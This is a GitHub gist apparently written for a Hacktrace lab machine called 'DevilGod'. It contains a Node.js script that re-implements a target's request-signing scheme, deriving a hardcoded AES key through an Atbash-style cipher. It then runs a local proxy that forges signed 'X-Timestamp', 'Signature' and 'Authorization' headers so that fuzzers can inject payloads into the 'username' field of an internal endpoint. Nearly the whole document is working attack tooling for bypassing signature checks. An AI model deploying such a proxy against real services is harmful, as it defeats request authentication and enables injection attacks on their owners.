Created
December 26, 2023 11:25
-
-
Save sharpicx/869e3fd8b479722fbbf0dba46b65fcd8 to your computer and use it in GitHub Desktop.
DevilGod - Hacktrace
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var CryptoJS = require("crypto-js"); | |
var http = require("http"); | |
var axios = require("axios"); | |
const { URLSearchParams } = require("url"); | |
let alphabet = "abcdefghijklmnopqrstuvwxyz"; | |
let fixedKey = "zyxwvutsrqponmlkjihgfedcba"; | |
function isUpperCase(letter) { | |
let charCode = letter.charCodeAt(0); | |
if(charCode >= 65 && charCode <= 90) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
function isLowerCase(letter) { | |
let charCode = letter.charCodeAt(0); | |
if(charCode >= 97 && charCode <= 122) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
function encrypt(text) { | |
let encrypted = ""; | |
for (let i = 0; i < text.length; i++) { | |
let index = 0; | |
if(isUpperCase(text[i])) { | |
let reversedIndex = 0; | |
let lower = text[i].toLowerCase(); | |
index = fixedKey.indexOf(lower); | |
if(index < 0 && index >= -27) { | |
reversedIndex = index * (-1); | |
} else { | |
reversedIndex = index; | |
} | |
let tempIndex = reversedIndex - 1 - 24; | |
if(tempIndex < 0) { | |
tempIndex = tempIndex * (-1); | |
} else { | |
tempIndex = tempIndex; | |
} | |
let reversedChar = fixedKey[tempIndex]; | |
encrypted +=reversedChar.toUpperCase(); | |
} else if(isLowerCase(text[i])) { | |
let reversedIndex = 0; | |
let lower = text[i].toLowerCase(); | |
index = fixedKey.indexOf(lower); | |
if(index < 0 && index >= -27) { | |
reversedIndex = index * (-1); | |
} else { | |
reversedIndex = index; | |
} | |
let tempIndex = reversedIndex - 1 - 24; | |
if(tempIndex < 0) { | |
tempIndex = tempIndex * (-1); | |
} else { | |
tempIndex = tempIndex; | |
} | |
let reversedChar = fixedKey[tempIndex]; | |
encrypted += reversedChar; | |
} else { | |
encrypted += text[i]; | |
} | |
} | |
return encrypted; | |
} | |
function getKey(){ | |
var key = encrypt("W3e1oT0wRhHlVzab"); | |
return key; | |
} | |
function Encrypt(raw){ | |
const text = CryptoJS.enc.Utf8.parse(raw); | |
const key = CryptoJS.enc.Utf8.parse(getKey()); | |
var encrypted = CryptoJS.AES.encrypt(text, key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7 }); | |
encrypted = encrypted.ciphertext.toString(CryptoJS.enc.Base64); | |
return encrypted; | |
} | |
function a(){ | |
var b = new Date(); | |
var c = b.toISOString(); | |
return c; | |
} | |
function b() { | |
var a = ''; | |
var b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; | |
var c = b.length; | |
for ( var i = 0; i < 20; i++ ) { | |
a += b.charAt(Math.floor(Math.random() * c)); | |
} | |
return a; | |
} | |
//const username = process.argv[2]; | |
var date_iso = a(); | |
var authorize = b(); | |
//const x = Encrypt(username.concat("&", date_iso, "&", authorize)); | |
const server = http.createServer(async (req, res) => { | |
const target = "http://10.1.2.138:8050/profile/getData" | |
const urlParams = new URLSearchParams(req.url.slice(1)); | |
const username = urlParams.get('username'); | |
const x = Encrypt(username.concat("&", date_iso, "&", authorize)); | |
try { | |
const headers = { | |
'X-Timestamp': date_iso, | |
'Signature': x, | |
'Authorization': authorize, | |
'Content-Type': 'application/x-www-form-urlencoded' | |
} | |
const data = new URLSearchParams(); | |
data.append('username', username); | |
axios.post( | |
target, data.toString(), { headers: headers | |
}) | |
.then(response => { | |
console.log(`[*] sent!\nrequest: ${username}\n`); | |
res.statusCode = response.status; | |
res.setHeader('Content-Type', 'text/plain'); | |
res.write(JSON.stringify(response.data)); | |
res.end(); | |
}) | |
.catch(error => { | |
res.statusCode = 500; | |
res.setHeader('Content-Type', 'text/plain'); | |
res.write(error.response.data); | |
res.end(); | |
}) | |
} catch (err) { | |
res.statusCode = 500; | |
res.setHeader('Content-Type', 'text/plain'); | |
res.end(`Error: ${err.message}`); | |
} | |
}); | |
const port = 8000; | |
server.listen(port, () => { | |
console.log('go attack it at: http://127.0.0.1:8000/?username=FUZZ'); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment